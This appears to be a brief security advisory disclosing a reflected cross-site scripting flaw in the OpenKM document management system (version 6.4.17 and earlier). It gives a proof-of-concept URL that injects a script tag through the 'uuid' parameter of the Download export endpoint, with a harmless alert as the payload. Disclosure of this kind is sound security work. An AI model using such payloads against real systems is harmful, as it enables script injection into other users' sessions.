Openkm Document Management System Suffers From Cross Site Scripting Attack
http://khalil-shreateh.com/khalil.shtml/images/articles/websites/vulnerabili
ties/openkm.jpg
Version <=6.4.17
Software Test http://demo.openkm.com/OpenKM/login.jsp
Auther : <https://www.facebook.com/khalil.shr> Khalil
<https://www.facebook.com/khalil.shr> Shreateh
Auther Website: http://khalil-shreateh.com
Status : Reported .
Report Link : http://issues.openkm.com/view.php?id=3056
Attack Description
log in with any user
Navigate to :
<http://demo.openkm.com/OpenKM/frontend/Download?export&uuid=%3Cscript%3Eale
rt%28%22XSS%20BY%20KHALIL%20SHREATEH\nkhalil-shreateh.com%22%29%3C/script%3E
>
http://demo.openkm.com/OpenKM/frontend/Download?export&uuid=%3Cscript%3Ealer
t%28%22XSS%20BY%20KHALIL%20SHREATEH\nkhalil-shreateh.com%22%29%3C/script%3E
POC IMAGE :
http://khalil-shreateh.com/khalil.shtml/images/articles/websites/vulnerabili
ties/xss.jpg